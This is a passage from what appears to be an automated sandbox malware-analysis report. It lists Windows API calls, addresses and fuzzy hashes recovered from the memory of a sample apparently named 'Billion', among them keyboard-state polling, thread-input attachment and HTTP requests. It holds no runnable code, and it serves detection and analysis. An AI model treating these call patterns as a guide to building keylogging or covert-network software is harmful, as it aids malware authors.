                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 001C4B3C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0d4fbbcfae92a8b216c76ed10aa8076c47c710288e58ce95fafbe25201272684
                                                                                                                                                                                                                                                                                                          • Instruction ID: b0dd82560453b1735d6ece085f2a36dec927eff9b9346d8b6ed9deb394afd276
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d4fbbcfae92a8b216c76ed10aa8076c47c710288e58ce95fafbe25201272684
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55315A72100215BBDF219FA4EC08FDA3FA9FF19724F110229FA15A61A0C735D860DBA4
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001B46B9
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001B46E7
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001B46F1
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001B478A
                                                                                                                                                                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 001B480E
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 001B4932
                                                                                                                                                                                                                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001B496B
                                                                                                                                                                                                                                                                                                          • CoGetObject.OLE32(?,00000000,001D0B64,?), ref: 001B498A
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 001B499D
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001B4A21
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001B4A35
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 001A8538
                                                                                                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001A85D4
                                                                                                                                                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 001A85E8
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(001D0CD4,00000000,00000001,001F7E8C,?), ref: 001A8634
                                                                                                                                                                                                                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001A86B9
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 001A8711
                                                                                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 001A879C
                                                                                                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001A87BF
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 001A87C6
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 001A881B
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001A8821
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0019039F
                                                                                                                                                                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 001903F8
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0019040A
                                                                                                                                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0019042A
                                                                                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0019047D
                                                                                                                                                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00190491
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001904A6
                                                                                                                                                                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 001904B3
                                                                                                                                                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001904BC
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001904CE
                                                                                                                                                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001904D9
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0019A65D
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 0019A6DE
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0019A6F9
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 0019A713
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0019A728
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 0019A740
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0019A752
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0019A76A
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0019A77C
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 0019A794
                                                                                                                                                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 0019A7A6
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                          • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32 ref: 001B41D1
                                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001B41DC
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,001D0B44,?), ref: 001B4236
                                                                                                                                                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 001B42A9
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001B4341
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001B4393
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                          • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 001A8C9C
                                                                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 001A8CAC
                                                                                                                                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001A8CB8
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001A8D55
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8D69
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8D9B
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001A8DD1
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8DDA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateMenu.USER32 ref: 001C4715
                                                                                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 001C4724
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001C47AC
                                                                                                                                                                                                                                                                                                          • IsMenu.USER32(?), ref: 001C47C0
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 001C47CA
                                                                                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001C47F7
                                                                                                                                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 001C47FF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                          • String ID: 0$F
                                                                                                                                                                                                                                                                                                          • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                                          • Opcode ID: d0870b404ad8d2179811b323411a93ff8b54738e9cb6405be62a960b9bda9172
                                                                                                                                                                                                                                                                                                          • Instruction ID: e1fa0643c760f68ad9d083684349b604f68dccf89de6afc2ed76ab66b5d68cc0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0870b404ad8d2179811b323411a93ff8b54738e9cb6405be62a960b9bda9172
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9415375A01209EFDB24CFA4E998FAA7BB5FF19314F14402DEA46A7360C770E914CB50
APIs
  • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
  • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 001928B1
• GetDlgCtrlID.USER32 ref: 001928BC
• GetParent.USER32 ref: 001928D8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 001928DB
• GetDlgCtrlID.USER32(?), ref: 001928E4
• GetParent.USER32(?), ref: 001928F8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 001928FB
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: 8ea760b8d949394b9e17a735ab2977ae18e6014dc519f4ed1d6726807587f8a8
• Instruction ID: d4f92c960ee43d6cba6ce78f76e2edf60beec869267c7bdcdc6f7c820241dd03
• Opcode Fuzzy Hash: 8ea760b8d949394b9e17a735ab2977ae18e6014dc519f4ed1d6726807587f8a8
• Instruction Fuzzy Hash: 0821D474900128BBCF04AFA0DC85EEEBFB4EF15314F000166F951A7291DB398849DB60
APIs
  • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
  • Part of subcall function 001945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00194620
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00192990
• GetDlgCtrlID.USER32 ref: 0019299B
• GetParent.USER32 ref: 001929B7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 001929BA
• GetDlgCtrlID.USER32(?), ref: 001929C3
• GetParent.USER32(?), ref: 001929D7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 001929DA
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: 5ef7f716cbbb91ed1f2c38c1f53118099a4f69803b614665ca564c4aad95e302
• Instruction ID: 55ddd0033aab8cf6cbc895a30ae474190e5201e085249430652eb1d8767613b6
• Opcode Fuzzy Hash: 5ef7f716cbbb91ed1f2c38c1f53118099a4f69803b614665ca564c4aad95e302
• Instruction Fuzzy Hash: 8221C3B5E00228BBCF05ABA0DC85EFEBFB8EF15304F004056FA51A7291DB759849DB60
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001C4539
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001C453C
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C4563
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001C4586
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001C45FE
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001C4648
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001C4663
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001C467E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001C4692
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001C46AF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 0019BB18
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BB2C
• GetWindowThreadProcessId.USER32(00000000), ref: 0019BB33
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BB42
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0019BB54
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BB6D
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BB7F
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BBC4
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BBD9
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BBE4
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• _free.LIBCMT ref: 00163007
  • Part of subcall function 00162D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4), ref: 00162D4E
  • Part of subcall function 00162D38: GetLastError.KERNEL32(00201DC4,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4,00201DC4), ref: 00162D60
• _free.LIBCMT ref: 00163013
• _free.LIBCMT ref: 0016301E
• _free.LIBCMT ref: 00163029
• _free.LIBCMT ref: 00163034
• _free.LIBCMT ref: 0016303F
• _free.LIBCMT ref: 0016304A
• _free.LIBCMT ref: 00163055
• _free.LIBCMT ref: 00163060
• _free.LIBCMT ref: 0016306E
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00132AF9
• OleUninitialize.OLE32(?,00000000), ref: 00132B98
• UnregisterHotKey.USER32(?), ref: 00132D7D
• DestroyWindow.USER32(?), ref: 00173A1B
• FreeLibrary.KERNEL32(?), ref: 00173A80
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00173AAD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001A89F2
• SetCurrentDirectoryW.KERNEL32(?), ref: 001A8A06
• GetFileAttributesW.KERNEL32(?), ref: 001A8A30
• SetFileAttributesW.KERNEL32(?,00000000), ref: 001A8A4A
• SetCurrentDirectoryW.KERNEL32(?), ref: 001A8A5C
• SetCurrentDirectoryW.KERNEL32(?), ref: 001A8AA5
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001A8AF5
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: 0a14e5fdb7e6e29c4fd47c27e75e97ac06598500537929859c6cf1e9b57a61c4
• Instruction ID: 230afe95ea19adadd891f0c8411407251c45ff2695ff2aec0de24d0a63748965
• Opcode Fuzzy Hash: 0a14e5fdb7e6e29c4fd47c27e75e97ac06598500537929859c6cf1e9b57a61c4
• Instruction Fuzzy Hash: E781AEB69043459BCB24EF14C444ABBB7E8BF9A314F58482EF885D7250EF34E945CB92
APIs
• IsWindow.USER32(00000000), ref: 001C8992
• IsWindowEnabled.USER32(00000000), ref: 001C899E
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 001C8A79
• SendMessageW.USER32(00000000,000000B0,?,?), ref: 001C8AAC
• IsDlgButtonChecked.USER32(?,00000000), ref: 001C8AE4
• GetWindowLongW.USER32(00000000,000000EC), ref: 001C8B06
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001C8B1E
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID: (
• API String ID: 4072528602-2181176062
• Opcode ID: 6dc877ea9c0022a562dcaf01393866cb5ef2306727cbdf4ff0f35d419a55183f
• Instruction ID: 43b421b2453d20ed05c2ae9563617a18ad7d46dbd448af737da51ce88e5d362f
• Opcode Fuzzy Hash: 6dc877ea9c0022a562dcaf01393866cb5ef2306727cbdf4ff0f35d419a55183f
• Instruction Fuzzy Hash: CB718A74600204AFEB25DF54C8C5FBABBB9EF6A304F14045EE855A7261CB31ED84DB61
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 001374D7
  • Part of subcall function 00137567: GetClientRect.USER32(?,?), ref: 0013758D
  • Part of subcall function 00137567: GetWindowRect.USER32(?,?), ref: 001375CE
  • Part of subcall function 00137567: ScreenToClient.USER32(?,?), ref: 001375F6
• GetDC.USER32 ref: 00176083
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00176096
• SelectObject.GDI32(00000000,00000000), ref: 001760A4
• SelectObject.GDI32(00000000,00000000), ref: 001760B9
• ReleaseDC.USER32(?,00000000), ref: 001760C1
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00176152
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 725b8836e8d596c8332084263419131b75d71da6a28db071084a2ecb48167714
• Instruction ID: 06f16814856fe94d99a7ece9879e4604641bd2964df54113dac064c025155932
• Opcode Fuzzy Hash: 725b8836e8d596c8332084263419131b75d71da6a28db071084a2ecb48167714
• Instruction Fuzzy Hash: D671BF71500605EFCF258F64DC88AAA7FB5FF89320F24866AFD595A1A6C731DC80DB60
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001ACCB7
                                                                                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001ACCDF
